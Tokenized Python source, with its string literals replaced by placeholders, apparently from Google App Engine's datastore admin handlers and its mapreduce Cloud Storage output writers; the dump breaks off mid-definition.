None ) , <EOL> '<STR_LIT>' : ( self . request . get ( '<STR_LIT>' ) and not <EOL> self . request . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : kind_stats , <EOL> '<STR_LIT>' : more_kinds , <EOL> '<STR_LIT>' : last_stats_update , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : app_identity . get_application_id ( ) , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' , None ) is not None , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sorted ( ENTITY_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT>' : sorted ( BACKUP_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT>' : sorted ( PENDING_BACKUP_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : self . GetOperations ( active = False ) , <EOL> '<STR_LIT>' : self . GetOperations ( active = True ) , <EOL> '<STR_LIT>' : self . GetPendingBackups ( ) , <EOL> '<STR_LIT>' : self . GetBackups ( ) , <EOL> '<STR_LIT>' : config . MAPREDUCE_PATH + '<STR_LIT>' <EOL> } <EOL> utils . RenderToResponse ( self , '<STR_LIT>' , template_params ) <EOL> def RouteAction ( self , action_dict ) : <EOL> action = self . request . get ( '<STR_LIT:action>' ) <EOL> if not action : <EOL> self . ListActions ( error = self . request . get ( '<STR_LIT:error>' , None ) ) <EOL> elif action not in action_dict : <EOL> error = '<STR_LIT>' % action <EOL> self . ListActions ( error = error ) <EOL> else : <EOL> action_dict [ action ] ( self ) <EOL> def get ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def post ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def GetKinds ( self , all_ns = True , deadline = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if all_ns : <EOL> kinds , more_kinds = self . GetKindsForAllNamespaces ( deadline ) <EOL> else : <EOL> kinds , more_kinds = self . GetKindsForCurrentNamespace ( deadline ) <EOL> return kinds , more_kinds <EOL> def GetKindsForAllNamespaces ( self , deadline ) : <EOL> """<STR_LIT>""" <EOL> start = time . time ( ) <EOL> kind_name_set = set ( ) <EOL> def ReadFromKindIters ( kind_iter_list ) : <EOL> """<STR_LIT>""" <EOL> completed = [ ] <EOL> for kind_iter in kind_iter_list : <EOL> try : <EOL> kind_name = kind_iter . next ( ) . kind_name <EOL> if utils . IsKindNameVisible ( kind_name ) : <EOL> kind_name_set . add ( kind_name ) <EOL> except StopIteration : <EOL> completed . append ( kind_iter ) <EOL> for kind_iter in completed : <EOL> kind_iter_list . remove ( kind_iter ) <EOL> more_kinds = False <EOL> try : <EOL> namespace_iter = metadata . Namespace . all ( ) . run ( batch_size = <NUM_LIT:1000> , <EOL> deadline = deadline ) <EOL> kind_iter_list = [ ] <EOL> for ns in namespace_iter : <EOL> remaining = deadline - ( time . time ( ) - start ) <EOL> if remaining <= <NUM_LIT:0> : <EOL> raise datastore_errors . Timeout <EOL> kind_iter_list . append ( metadata . Kind . all ( namespace = ns . namespace_name ) <EOL> . run ( batch_size = <NUM_LIT:1000> , deadline = remaining ) ) <EOL> while len ( kind_iter_list ) == MAX_RPCS : <EOL> ReadFromKindIters ( kind_iter_list ) <EOL> while kind_iter_list : <EOL> ReadFromKindIters ( kind_iter_list ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> more_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return sorted ( kind_name_set ) , more_kinds <EOL> def GetKindsForCurrentNamespace ( self , deadline ) : <EOL> """<STR_LIT>""" <EOL> more_kinds = False <EOL> kind_names = [ ] <EOL> try : <EOL> kinds = metadata . Kind . all ( ) . order ( '<STR_LIT>' ) . run ( batch_size = <NUM_LIT:1000> , <EOL> deadline = deadline ) <EOL> for kind in kinds : <EOL> kind_name = kind . kind_name <EOL> if utils . IsKindNameVisible ( kind_name ) : <EOL> kind_names . append ( kind_name ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> more_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return kind_names , more_kinds <EOL> def GetOperations ( self , active = False , limit = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> query = utils . DatastoreAdminOperation . all ( ) <EOL> if active : <EOL> query . filter ( '<STR_LIT>' , utils . DatastoreAdminOperation . STATUS_ACTIVE ) <EOL> else : <EOL> query . filter ( '<STR_LIT>' , [ <EOL> utils . DatastoreAdminOperation . STATUS_COMPLETED , <EOL> utils . DatastoreAdminOperation . STATUS_FAILED , <EOL> utils . DatastoreAdminOperation . STATUS_ABORTED ] ) <EOL> operations = query . fetch ( max ( <NUM_LIT> , limit ) if limit else <NUM_LIT:1000> ) <EOL> operations = sorted ( operations , key = operator . attrgetter ( '<STR_LIT>' ) , <EOL> reverse = True ) <EOL> return operations [ : limit ] <EOL> def GetBackups ( self , limit = <NUM_LIT:100> , deadline = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> backups = [ ] <EOL> query = backup_handler . BackupInformation . all ( ) <EOL> query . filter ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> query . order ( '<STR_LIT>' ) <EOL> try : <EOL> backups . extend ( query . run ( deadline = deadline , limit = limit ) ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return backups <EOL> def GetPendingBackups ( self , limit = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> query = backup_handler . BackupInformation . all ( ) <EOL> query . filter ( '<STR_LIT>' , None ) <EOL> backups = query . fetch ( max ( <NUM_LIT> , limit ) if limit else <NUM_LIT:1000> ) <EOL> backups = sorted ( backups , key = operator . attrgetter ( '<STR_LIT>' ) , <EOL> reverse = True ) <EOL> return backups [ : limit ] <EOL> class StaticResourceHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> _BASE_FILE_PATH = os . path . dirname ( __file__ ) <EOL> _RESOURCE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get ( self ) : <EOL> relative_path = self . request . path . split ( config . BASE_PATH + '<STR_LIT:/>' ) [ <NUM_LIT:1> ] <EOL> if relative_path not in self . _RESOURCE_MAP : <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> return <EOL> path = os . path . join ( self . _BASE_FILE_PATH , relative_path ) <EOL> self . response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = self . _RESOURCE_MAP [ relative_path ] <EOL> if relative_path == '<STR_LIT>' : <EOL> self . response . out . write ( <EOL> open ( path ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . response . out . write ( open ( path ) . read ( ) ) <EOL> class LoginRequiredHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> target = self . request . get ( '<STR_LIT>' ) <EOL> if not target : <EOL> self . error ( <NUM_LIT> ) <EOL> return <EOL> login_url = users . create_login_url ( target ) <EOL> self . redirect ( login_url ) <EOL> def CreateApplication ( ) : <EOL> """<STR_LIT>""" <EOL> return webapp . WSGIApplication ( <EOL> backup_handler . handlers_list ( config . BASE_PATH ) + <EOL> copy_handler . handlers_list ( config . BASE_PATH ) + <EOL> [ ( r'<STR_LIT>' % ( config . BASE_PATH , <EOL> delete_handler . ConfirmDeleteHandler . SUFFIX ) , <EOL> delete_handler . ConfirmDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( config . BASE_PATH , delete_handler . DoDeleteHandler . SUFFIX ) , <EOL> delete_handler . DoDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( config . BASE_PATH , utils . MapreduceDoneHandler . SUFFIX ) , <EOL> utils . MapreduceDoneHandler ) , <EOL> ( config . DEFERRED_PATH , deferred . TaskHandler ) , <EOL> ( r'<STR_LIT>' % config . BASE_PATH , StaticResourceHandler ) , <EOL> ( r'<STR_LIT>' , LoginRequiredHandler ) , <EOL> ( r'<STR_LIT>' , RouteByActionHandler ) ] ) <EOL> APP = CreateApplication ( ) <EOL> def main ( ) : <EOL> util . run_wsgi_app ( APP ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext . mapreduce import shard_life_cycle <EOL> class Mapper ( shard_life_cycle . _ShardLifeCycle ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __call__ ( self , slice_ctx , val ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> import cStringIO <EOL> import gc <EOL> import logging <EOL> import pickle <EOL> import random <EOL> import string <EOL> import time <EOL> from google . appengine . ext . mapreduce import context <EOL> from google . appengine . ext . mapreduce import errors <EOL> from google . appengine . ext . mapreduce import json_util <EOL> from google . appengine . ext . mapreduce import kv_pb <EOL> from google . appengine . ext . mapreduce import model <EOL> from google . appengine . ext . mapreduce import operation <EOL> from google . appengine . ext . mapreduce import records <EOL> from google . appengine . ext . mapreduce import shard_life_cycle <EOL> try : <EOL> cloudstorage = None <EOL> from google . appengine . _internal import cloudstorage <EOL> if hasattr ( cloudstorage , "<STR_LIT>" ) : <EOL> cloudstorage = None <EOL> if cloudstorage : <EOL> from google . appengine . _internal . cloudstorage import cloudstorage_api <EOL> from google . appengine . _internal . cloudstorage import errors as cloud_errors <EOL> except ImportError : <EOL> pass <EOL> if cloudstorage is None : <EOL> try : <EOL> import cloudstorage <EOL> from cloudstorage import cloudstorage_api <EOL> from cloudstorage import errors as cloud_errors <EOL> except ImportError : <EOL> pass <EOL> COUNTER_IO_WRITE_BYTES = "<STR_LIT>" <EOL> COUNTER_IO_WRITE_MSEC = "<STR_LIT>" <EOL> class OutputWriter ( json_util . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> def finalize ( self , ctx , shard_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> _FILE_POOL_FLUSH_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _FILE_POOL_MAX_SIZE = <NUM_LIT:1000> * <NUM_LIT> <EOL> def _get_params ( mapper_spec , allowed_keys = None , allow_old = True ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" not in mapper_spec . params : <EOL> message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not allow_old or allowed_keys : <EOL> raise errors . BadWriterParamsError ( message ) <EOL> params = mapper_spec . params <EOL> params = dict ( ( str ( n ) , v ) for n , v in params . iteritems ( ) ) <EOL> else : <EOL> if not isinstance ( mapper_spec . params . get ( "<STR_LIT>" ) , dict ) : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" ) <EOL> params = mapper_spec . params . get ( "<STR_LIT>" ) <EOL> params = dict ( ( str ( n ) , v ) for n , v in params . iteritems ( ) ) <EOL> if allowed_keys : <EOL> params_diff = set ( params . keys ( ) ) - allowed_keys <EOL> if params_diff : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( params_diff ) ) <EOL> return params <EOL> class _RecordsPoolBase ( context . Pool ) : <EOL> """<STR_LIT>""" <EOL> _RECORD_OVERHEAD_BYTES = <NUM_LIT:10> <EOL> def __init__ ( self , <EOL> flush_size_chars = _FILE_POOL_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> self . _ctx = ctx <EOL> self . _exclusive = exclusive <EOL> def append ( self , data ) : <EOL> """<STR_LIT>""" <EOL> data_length = len ( data ) <EOL> if self . _size + data_length > self . _flush_size : <EOL> self . flush ( ) <EOL> if not self . _exclusive and data_length > _FILE_POOL_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" % ( data_length , _FILE_POOL_MAX_SIZE ) ) <EOL> else : <EOL> self . _buffer . append ( data ) <EOL> self . _size += data_length <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> buf = cStringIO . StringIO ( ) <EOL> with records . RecordsWriter ( buf ) as w : <EOL> for record in self . _buffer : <EOL> w . write ( record ) <EOL> w . _pad_block ( ) <EOL> str_buf = buf . getvalue ( ) <EOL> buf . close ( ) <EOL> if not self . _exclusive and len ( str_buf ) > _FILE_POOL_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( _FILE_POOL_MAX_SIZE , len ( str_buf ) ) ) <EOL> start_time = time . time ( ) <EOL> self . _write ( str_buf ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( str_buf ) ) ( self . _ctx ) <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> gc . collect ( ) <EOL> def _write ( self , str_buf ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % type ( self ) ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . flush ( ) <EOL> class GCSRecordsPool ( _RecordsPoolBase ) : <EOL> """<STR_LIT>""" <EOL> _GCS_BLOCK_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> def __init__ ( self , <EOL> filehandle , <EOL> flush_size_chars = _FILE_POOL_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> super ( GCSRecordsPool , self ) . __init__ ( flush_size_chars , ctx , exclusive ) <EOL> self . _filehandle = filehandle <EOL> self . _buf_size = <NUM_LIT:0> <EOL> def _write ( self , str_buf ) : <EOL> """<STR_LIT>""" <EOL> self . _filehandle . write ( str_buf ) <EOL> self . _buf_size += len ( str_buf ) <EOL> def flush ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> super ( GCSRecordsPool , self ) . flush ( ) <EOL> if force : <EOL> extra_padding = self . _buf_size % self . _GCS_BLOCK_SIZE <EOL> if extra_padding > <NUM_LIT:0> : <EOL> self . _write ( "<STR_LIT:\x00>" * ( self . _GCS_BLOCK_SIZE - extra_padding ) ) <EOL> self . _filehandle . flush ( ) <EOL> class _GoogleCloudStorageBase ( shard_life_cycle . _ShardLifeCycle , <EOL> OutputWriter ) : <EOL> """<STR_LIT>""" <EOL> BUCKET_NAME_PARAM = "<STR_LIT>" <EOL> TMP_BUCKET_NAME_PARAM = "<STR_LIT>" <EOL> ACL_PARAM = "<STR_LIT>" <EOL> NAMING_FORMAT_PARAM = "<STR_LIT>" <EOL> CONTENT_TYPE_PARAM = "<STR_LIT>" <EOL> _ACCOUNT_ID_PARAM = "<STR_LIT>" <EOL> _TMP_ACCOUNT_ID_PARAM = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_gcs_bucket ( cls , writer_spec ) : <EOL> return writer_spec [ cls . BUCKET_NAME_PARAM ] <EOL> @ classmethod <EOL> def _get_account_id ( cls , writer_spec ) : <EOL> return writer_spec . get ( cls . _ACCOUNT_ID_PARAM , None ) <EOL> @ classmethod <EOL> def _get_tmp_gcs_bucket ( cls , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . TMP_BUCKET_NAME_PARAM in writer_spec : <EOL> return writer_spec [ cls . TMP_BUCKET_NAME_PARAM ] <EOL> return cls . _get_gcs_bucket ( writer_spec ) <EOL> @ classmethod <EOL> def _get_tmp_account_id ( cls , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . TMP_BUCKET_NAME_PARAM in writer_spec : <EOL> return writer_spec . get ( cls . _TMP_ACCOUNT_ID_PARAM , None ) <EOL> return cls . _get_account_id ( writer_spec ) <EOL> class _GoogleCloudStorageOutputWriterBase ( _GoogleCloudStorageBase ) : <EOL> """<STR_LIT>""" <EOL> _DEFAULT_NAMING_FORMAT = "<STR_LIT>" <EOL> _MR_TMP = "<STR_LIT>" <EOL> _TMP_FILE_NAMING_FORMAT = ( <EOL> _MR_TMP + "<STR_LIT>" ) <EOL> @ classmethod <EOL> def _generate_filename ( cls , writer_spec , name , job_id , num , <EOL> attempt = None , seg_index = None ) : <EOL> """<STR_LIT>""" <EOL> naming_format = cls . _TMP_FILE_NAMING_FORMAT <EOL> if seg_index is None : <EOL> naming_format = writer_spec . get ( cls . NAMING_FORMAT_PARAM , <EOL> cls . _DEFAULT_NAMING_FORMAT ) <EOL> template = string . Template ( naming_format ) <EOL> try : <EOL> if seg_index is None : <EOL> return template . substitute ( name = name , id = job_id , num = num ) <EOL> else : <EOL> return template . substitute ( name = name , id = job_id , num = num , <EOL> attempt = attempt , <EOL> seg = seg_index ) <EOL> except ValueError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" % ( error ) ) <EOL> except KeyError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( naming_format , error ) ) <EOL> @ classmethod <EOL> def get_params ( cls , mapper_spec , allowed_keys = None , allow_old = True ) : <EOL> params = _get_params ( mapper_spec , allowed_keys , allow_old ) <EOL> if ( mapper_spec . params . get ( cls . BUCKET_NAME_PARAM ) is not None and <EOL> params . get ( cls . BUCKET_NAME_PARAM ) is None ) : <EOL> params [ cls . BUCKET_NAME_PARAM ] = mapper_spec . params [ cls . BUCKET_NAME_PARAM ] <EOL> return params <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mapper_spec , allow_old = False ) <EOL> if cls . BUCKET_NAME_PARAM not in writer_spec : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % <EOL> cls . BUCKET_NAME_PARAM ) <EOL> try : <EOL> cloudstorage . validate_bucket_name ( <EOL> writer_spec [ cls . BUCKET_NAME_PARAM ] ) <EOL> except ValueError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" % ( error ) ) <EOL> cls . _generate_filename ( writer_spec , "<STR_LIT:name>" , "<STR_LIT:id>" , <NUM_LIT:0> ) <EOL> cls . _generate_filename ( writer_spec , "<STR_LIT:name>" , "<STR_LIT:id>" , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def _open_file ( cls , writer_spec , filename_suffix , use_tmp_bucket = False ) : <EOL> """<STR_LIT>""" <EOL> if use_tmp_bucket : <EOL> bucket = cls . _get_tmp_gcs_bucket ( writer_spec ) <EOL> account_id = cls . _get_tmp_account_id ( writer_spec ) <EOL> else : <EOL> bucket = cls . _get_gcs_bucket ( writer_spec ) <EOL> account_id = cls . _get_account_id ( writer_spec ) <EOL> filename = "<STR_LIT>" % ( bucket , filename_suffix ) <EOL> content_type = writer_spec . get ( cls . CONTENT_TYPE_PARAM , None ) <EOL> options = { } <EOL> if cls . ACL_PARAM in writer_spec : <EOL> options [ "<STR_LIT>" ] = writer_spec . get ( cls . ACL_PARAM ) <EOL> return cloudstorage . open ( filename , mode = "<STR_LIT:w>" , content_type = content_type , <EOL> options = options , _account_id = account_id ) <EOL> @ classmethod <EOL> def _get_filename ( cls , shard_state ) : <EOL> return shard_state . writer_state [ "<STR_LIT:filename>" ] <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> filenames = [ ] <EOL> for shard in model . ShardState . find_all_by_mapreduce_state ( mapreduce_state ) : <EOL> if shard . result_status == model . ShardState . RESULT_SUCCESS : <EOL> filenames . append ( cls . _get_filename ( shard ) ) <EOL> return filenames <EOL> def _get_write_buffer ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> start_time = time . time ( ) <EOL> self . _get_write_buffer ( ) . write ( data ) <EOL> ctx = context . get ( ) <EOL> operation . counters . Increment ( COUNTER_IO_WRITE_BYTES , len ( data ) ) ( ctx ) <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( ctx ) <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> return True <EOL> class _GoogleCloudStorageOutputWriter ( _GoogleCloudStorageOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> _SEG_PREFIX = "<STR_LIT>" <EOL> _LAST_SEG_INDEX = "<STR_LIT>" <EOL> _JSON_GCS_BUFFER = "<STR_LIT>" <EOL> _JSON_SEG_INDEX = "<STR_LIT>" <EOL> _JSON_NO_DUP = "<STR_LIT>" <EOL> _VALID_LENGTH = "<STR_LIT>" <EOL> _NO_DUPLICATE = "<STR_LIT>" <EOL> def __init__ ( self , streaming_buffer , writer_spec = None ) : <EOL> """<STR_LIT>""" <EOL> self . _streaming_buffer = streaming_buffer <EOL> self . _no_dup = False <EOL> if writer_spec : <EOL> self . _no_dup = writer_spec . get ( self . _NO_DUPLICATE , False ) <EOL> if self . _no_dup : <EOL> self . _seg_index = int ( streaming_buffer . name . rsplit ( "<STR_LIT:->" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] ) <EOL> self . _seg_valid_length = <NUM_LIT:0> <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mapper_spec , allow_old = False ) <EOL> if writer_spec . get ( cls . _NO_DUPLICATE , False ) not in ( True , False ) : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" ) <EOL> super ( _GoogleCloudStorageOutputWriter , cls ) . validate ( mapper_spec ) <EOL> def _get_write_buffer ( self ) : <EOL> return self . _streaming_buffer <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mr_spec . mapper , allow_old = False ) <EOL> seg_index = None <EOL> if writer_spec . get ( cls . _NO_DUPLICATE , False ) : <EOL> seg_index = <NUM_LIT:0> <EOL> key = cls . _generate_filename ( writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , shard_attempt , <EOL> seg_index ) <EOL> return cls . _create ( writer_spec , key ) <EOL> @ classmethod <EOL> def _create ( cls , writer_spec , filename_suffix ) : <EOL> """<STR_LIT>""" <EOL> writer = cls . _open_file ( writer_spec , filename_suffix ) <EOL> return cls ( writer , writer_spec = writer_spec ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> writer = cls ( pickle . loads ( state [ cls . _JSON_GCS_BUFFER ] ) ) <EOL> no_dup = state . get ( cls . _JSON_NO_DUP , False ) <EOL> writer . _no_dup = no_dup <EOL> if no_dup : <EOL> writer . _seg_valid_length = state [ cls . _VALID_LENGTH ] <EOL> writer . _seg_index = state [ cls . _JSON_SEG_INDEX ] <EOL> return writer <EOL> def end_slice ( self , slice_ctx ) : <EOL> if not self . _streaming_buffer . closed : <EOL> self . _streaming_buffer . flush ( ) <EOL> def to_json ( self ) : <EOL> result = { self . _JSON_GCS_BUFFER : pickle . dumps ( self . _streaming_buffer ) , <EOL> self . _JSON_NO_DUP : self . _no_dup } <EOL> if self . _no_dup : <EOL> result . update ( { <EOL> self . _VALID_LENGTH : self . _streaming_buffer . tell ( ) , <EOL> self . _JSON_SEG_INDEX : self . _seg_index } ) <EOL> return result <EOL> def finalize ( self , ctx , shard_state ) : <EOL> self . _streaming_buffer . close ( ) <EOL> if self . _no_dup : <EOL> cloudstorage_api . copy2 ( <EOL> self . _streaming_buffer . name , <EOL> self . _streaming_buffer . name , <EOL> metadata = { self . _VALID_LENGTH : self . _streaming_buffer . tell ( ) } ) <EOL> mr_spec = ctx . mapreduce_spec <EOL> writer_spec = self . get_params ( mr_spec . mapper , allow_old = False ) <EOL> filename = self . _generate_filename ( writer_spec , <EOL> mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_state . shard_number ) <EOL> seg_filename = self . _streaming_buffer . name <EOL> prefix , last_index = seg_filename . rsplit ( "<STR_LIT:->" , <NUM_LIT:1> ) <EOL> shard_state . writer_state = { self . _SEG_PREFIX : prefix + "<STR_LIT:->" , <EOL> self . _LAST_SEG_INDEX : int ( last_index ) , <EOL> "<STR_LIT:filename>" : filename } <EOL> else : <EOL> shard_state . writer_state = { "<STR_LIT:filename>" : self . _streaming_buffer . name } <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> writer_spec = self . get_params ( mapper_spec , allow_old = False ) <EOL> return writer_spec . get ( self . _NO_DUPLICATE , False ) <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> next_seg_index = self . _seg_index <EOL> if self . _seg_valid_length != <NUM_LIT:0> : <EOL> try : <EOL> gcs_next_offset = self . _streaming_buffer . _get_offset_from_gcs ( ) + <NUM_LIT:1> <EOL> if gcs_next_offset > self . _streaming_buffer . tell ( ) : <EOL> self . _streaming_buffer . _force_close ( gcs_next_offset ) <EOL> else : <EOL> self . _streaming_buffer . close ( ) <EOL> except cloudstorage . FileClosedError : <EOL> pass <EOL> cloudstorage_api . copy2 ( <EOL> self . _streaming_buffer . name , <EOL> self . _streaming_buffer . name , <EOL> metadata = { self . _VALID_LENGTH : <EOL> self . _seg_valid_length } ) <EOL> next_seg_index = self . _seg_index + <NUM_LIT:1> <EOL> writer_spec = self . get_params ( mr_spec . mapper , allow_old = False ) <EOL> key = self . _generate_filename ( <EOL> writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , <EOL> shard_attempt , <EOL> next_seg_index ) <EOL> new_writer = self . _create ( writer_spec , key ) <EOL> new_writer . _seg_index = next_seg_index <EOL> return new_writer <EOL> def _get_filename_for_test ( self ) : <EOL> return self . _streaming_buffer . name <EOL> GoogleCloudStorageOutputWriter = _GoogleCloudStorageOutputWriter <EOL> class _ConsistentStatus ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . writer_spec = None <EOL> self . mapreduce_id = None <EOL> self . shard = None <EOL> self . mainfile = None <EOL> self . tmpfile = None <EOL> self . tmpfile_1ago = None <EOL> class GoogleCloudStorageConsistentOutputWriter ( <EOL> _GoogleCloudStorageOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> _JSON_STATUS = "<STR_LIT:status>" <EOL> _RAND_BITS = <NUM_LIT> <EOL> _REWRITE_BLOCK_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _REWRITE_MR_TMP = "<STR_LIT>" <EOL> _TMPFILE_PATTERN = _REWRITE_MR_TMP + "<STR_LIT>" <EOL> _TMPFILE_PREFIX = _REWRITE_MR_TMP + "<STR_LIT>" <EOL> def __init__ ( self , status ) : <EOL> """<STR_LIT>""" <EOL> self . status = status <EOL> self . _data_written_to_slice = False <EOL> def _get_write_buffer ( self ) : <EOL> if not self . status . tmpfile : <EOL> raise errors . FailJobError ( <EOL> "<STR_LIT>" ) <EOL> return self . status . tmpfile <EOL> def _get_filename_for_test ( self ) : <EOL> return self . status . mainfile . name <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , 